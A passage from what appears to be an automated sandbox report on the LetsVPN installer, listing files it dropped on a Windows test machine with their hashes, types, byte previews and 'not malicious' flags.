                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.... .c.....KU7.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................zq.....................E..........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\LetsVPN\GoogleAnalytics\LetsGoogleAnalytics.db-shm

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                  Entropy (8bit):0.0591149673195505
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:GWlmtsNW8AcE4WlmtsNW8AccmR9Xml/Xml/wIol/wUEocZNm:Stck4tc8wSaIojZ
                                                                                                                                                                                                  MD5:ED79FFB1FB285DADF5EFED6B7947F41C
                                                                                                                                                                                                  SHA1:22B84FE56A6DA78044B9F559F5C5C0DF8565F10B
                                                                                                                                                                                                  SHA-256:4F21A3FAD83E8CC8C460912409BADC3A535A7B6C6D06821D07D9F56EBE2229B8
                                                                                                                                                                                                  SHA-512:30CB25F132EE5BA26B608AAFF8EED9769A86B618BA40642934D679075AA4F238E145A7388A6560BACBA12E4CFBE6949014E381AC494735C19C27445B33F46001
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:..-.......................(..Y.xlH.=U.s8r..~Mk.$..-.......................(..Y.xlH.=U.s8r..~Mk.$........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\LetsVPN\GoogleAnalytics\LetsGoogleAnalytics.db-wal

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):111272
                                                                                                                                                                                                  Entropy (8bit):0.33860568672028296
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Apstua2KRmfVRGxR0FGRnVjBKRFRIZYGRdLREmr23U074iPKRLRWr23U074ii:zcB6BVj5ZY1M2U074i/2U074ii
                                                                                                                                                                                                  MD5:BC829283CF42A13088C9FBA44E38AC1D
                                                                                                                                                                                                  SHA1:0148C3DEFC211B12CC1C12BF5C95E015942BE682
                                                                                                                                                                                                  SHA-256:2AF14BC93572742D31BFE84BB44F75B5759FF75FC6FF6CFBB59C7636A64EBAA8
                                                                                                                                                                                                  SHA-512:50FA9088105D279231BC71B85844D2AA1AE9AB799928A3F823008F31B67165B86FAB8D37FBD137B8C08735576167904CD3F0651483054243914F55C05D92F0AA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:7....-..........lH.=U.s8..K..2 y........lH.=U.s8%J...~A.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\LetsVPN\LetsPRO.exe_Url_gwhy31c0ckt0g0pzcsdphrcj25fn5jbm\AppCenter.config (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):199
                                                                                                                                                                                                  Entropy (8bit):5.088272658260225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:vFWWMNHU8LdgCQcIMOofqRqLVuXKCWAa8LDMBlTqqUaXKIy50NPLQaF9ULVuuQIT:TMVBd1IGpOSAMBluqT027G3QIT
                                                                                                                                                                                                  MD5:893F6F5C9E2512276F56ED8B520C7441
                                                                                                                                                                                                  SHA1:835B4F9560C539208FDE524CA0816470A034E7E8
                                                                                                                                                                                                  SHA-256:DAD7AD623FABF515AA7BC8EBBC9D763CC531F91B93F7216F9D2ED170D082768C
                                                                                                                                                                                                  SHA-512:824F153EE690EFB57BA9F682C4ABC71F79BE47E55D75F81EADDA4A30C2DA807499202F2285D2BE954D97B919807641B4026BF2B1F13CC6217B0462C59E8CD0CE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <appSettings>.. <add key="AppCenterInstallId" value="17802164-65a0-40c7-a04c-a8cf1b8b2817" />.. </appSettings>..</configuration>

                                                                                                                                                                                                  C:\Users\user\AppData\Local\LetsVPN\LetsPRO.exe_Url_gwhy31c0ckt0g0pzcsdphrcj25fn5jbm\bvhw2trt.newcfg

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):199
                                                                                                                                                                                                  Entropy (8bit):5.088272658260225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:vFWWMNHU8LdgCQcIMOofqRqLVuXKCWAa8LDMBlTqqUaXKIy50NPLQaF9ULVuuQIT:TMVBd1IGpOSAMBluqT027G3QIT
                                                                                                                                                                                                  MD5:893F6F5C9E2512276F56ED8B520C7441
                                                                                                                                                                                                  SHA1:835B4F9560C539208FDE524CA0816470A034E7E8
                                                                                                                                                                                                  SHA-256:DAD7AD623FABF515AA7BC8EBBC9D763CC531F91B93F7216F9D2ED170D082768C
                                                                                                                                                                                                  SHA-512:824F153EE690EFB57BA9F682C4ABC71F79BE47E55D75F81EADDA4A30C2DA807499202F2285D2BE954D97B919807641B4026BF2B1F13CC6217B0462C59E8CD0CE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <appSettings>.. <add key="AppCenterInstallId" value="17802164-65a0-40c7-a04c-a8cf1b8b2817" />.. </appSettings>..</configuration>

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\AppCenter\17802164-65a0-40c7-a04c-a8cf1b8b2817\Logs.db

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3031001, file counter 11, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                  Entropy (8bit):2.0333287080422964
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:TSYr2ZCg2xB32t5qxB3mdIqT9R//htI/sxB3mdIqT9R//hcAX5JxB3/WdIqT9R/Q:mJ2xJ2SxJmC89JIkxJmC89QAbxJeC89y
                                                                                                                                                                                                  MD5:5210F39F828D673DFA5489C98084E869
                                                                                                                                                                                                  SHA1:A388970EA7897BC1254A93E020261F105C103855
                                                                                                                                                                                                  SHA-256:FCF9331848120F363CF5DD4736DD8693993C77EC367F27DE3EF92EDDD506E782
                                                                                                                                                                                                  SHA-512:C7EBB3FB0D9FBDB6B18B90C448C63EA92A98332740A9645FA474A9130E15CCE3046BD3356B95BC43072DBD11C0FB3AF209D3DA283DC9791A4B8B463E214529AA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................?.......*..|.*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\AppCenter\17802164-65a0-40c7-a04c-a8cf1b8b2817\Logs.db-journal

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):12824
                                                                                                                                                                                                  Entropy (8bit):1.986820412085026
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:792xJfC89rJoxJvIkxJmC89QAbxJeC8940p:7AfC89Now0mC893eC894U
                                                                                                                                                                                                  MD5:3E9F1509B4E5C61363FEFD10079BA8E6
                                                                                                                                                                                                  SHA1:41485EC0461A5E81DA8D0F628A7B60D04E05D80E
                                                                                                                                                                                                  SHA-256:5F939CAEA006CBF072B344AB13456B755B45CDC307CB4B91C04F691F7F3BBE70
                                                                                                                                                                                                  SHA-512:92C7A08FF6A97F80FF85AB362C9273105F850B01615450D3EE948A4450501180FEC213EF88C44A99E8A51EA5520C3CBD1386DB104F3F9F38ECA5CD1C2257D290
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.... .c.....!.{v........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LetsPRO.exe.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2424
                                                                                                                                                                                                  Entropy (8bit):5.348163999675204
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeYHKU57UjHKtHKMRtHj:iqlYqh3ou0aymsqwtI6eqzVqU57Ujqtp
                                                                                                                                                                                                  MD5:1D015055F59E3C59A292A836E94902DB
                                                                                                                                                                                                  SHA1:6606627C577A8D9FBB362C0FFFD5E500295CA4AC
                                                                                                                                                                                                  SHA-256:D72DA6BAE429BF4A293DF3A8B637CC821491A9585DEA47553D6753A50D6EE519
                                                                                                                                                                                                  SHA-512:C2484FDCB22662B80659A9BD978CB1995D1C7912E6E24AABCF917862DB74F900B4775A24EE922B7A9B41CA48B5EF82C2E13C951D2CAD716B86FA11E1687C2EFA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34383
                                                                                                                                                                                                  Entropy (8bit):5.053402703870376
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:QPV3IpNBQkj2Ph4iUxsfrRJv5FqvXhARlardFRgrOdBPtAHkDNZbNKeCMiYo6:QPV3CNBQkj2Ph4iUxsflJnqv6qdPgrOf
                                                                                                                                                                                                  MD5:D63CB5E171D7FCFE28C9E904F6855F08
                                                                                                                                                                                                  SHA1:8C6B004EC20FF61EF4CA9EAFA6F0254364A960AB
                                                                                                                                                                                                  SHA-256:F081E30CF5BB68206C7A59B83BC914B9BD2ED59FBEE26843075D2D0CD7393354
                                                                                                                                                                                                  SHA-512:E9F534C0087182A51D5BE60E14FA992B2B933F444D32C2A2DBA3C7D4FCD6A1F418CF7A6A8B37165A61ED4D5B096716308035E117199A5B94FA796B58C041DB74
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:PSMODULECACHE.......CB.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........{HB.z..S...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1........Get-NetSwitchTeam........Add-NetSwitchTeamMember........Get-NetSwitchTeamMember........Remove-NetSwitchTeamMember........New-NetSwitchTeam........Rename-NetSwitchTeam........Remove-NetSwitchTeam..........zB.z..E...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1........Get-NetQosPolicy........Remove-Ne

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2240
                                                                                                                                                                                                  Entropy (8bit):5.375009441102135
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:BBWSU4xymI4RfoUeW+gZ9tK8NPP8xL7u1iMuge//ZPn9yuE:BBLHxvIIwLgZ2KHuLOugYE
                                                                                                                                                                                                  MD5:6189BE3FC23AC08D774F6B12AA130955
                                                                                                                                                                                                  SHA1:70B5F047828AFDD29A75C47F9AA454F08F22A316
                                                                                                                                                                                                  SHA-256:4D99710F2D00924C8785E449988A40C225EEFCB4AFED8F749E3CDF9F8701D9D7
                                                                                                                                                                                                  SHA-512:717EEEA55094E75662984F019F1D58C3F2948CA07F87BF78AE3AC809B2BE3064302F5320B3CCF45550E84CE9A42CC6770E7C829EB8CF4D6DE9AD55219D356F02
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:@...e...................................J.......................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1g43hckv.0dv.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4m30dwjf.2tw.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ep24vraz.ayh.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdpoqk3g.guc.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ml05os2o.x0p.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2uwujr3.qxc.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4sbqdat.zy5.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wwhg3rwo.gx2.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\System.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                  Entropy (8bit):5.804946284177748
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                                                                                                                                                                  MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                                                                                                                                                                  SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                                                                                                                                                                  SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                                                                                                                                                                  SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\modern-header.bmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 150 x 57 x 8, image size 8666, resolution 2834 x 2834 px/m, 255 important colors, cbSize 9740, bits offset 1074
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9740
                                                                                                                                                                                                  Entropy (8bit):6.554125039233327
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:bDIK82wKywC116+rwdTKMRjwgKhww4R1jwlIHvNbmwQo8TTJG4:bv82wKywC7DrwdTKMRjwgKhwwY1jwlQq
                                                                                                                                                                                                  MD5:5ACF495828FEAE7F85E006B7774AF497
                                                                                                                                                                                                  SHA1:5D2EEF3EEBB9A72678DCCD404475341116508306
                                                                                                                                                                                                  SHA-256:6CFEBB59F0BA1B9F1E8D7AA6387F223A468EB2FF74A9ED3C3F4BB688C2B6455E
                                                                                                                                                                                                  SHA-512:D1D40C88E2167315A309005B831ACBEAB0919D5A3B1FF5AAA273DB945C8818FC2118EFDB503E4BDA055F309306E72224F54DEF0B1F0AB6F61FE4DBA66784ED68
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
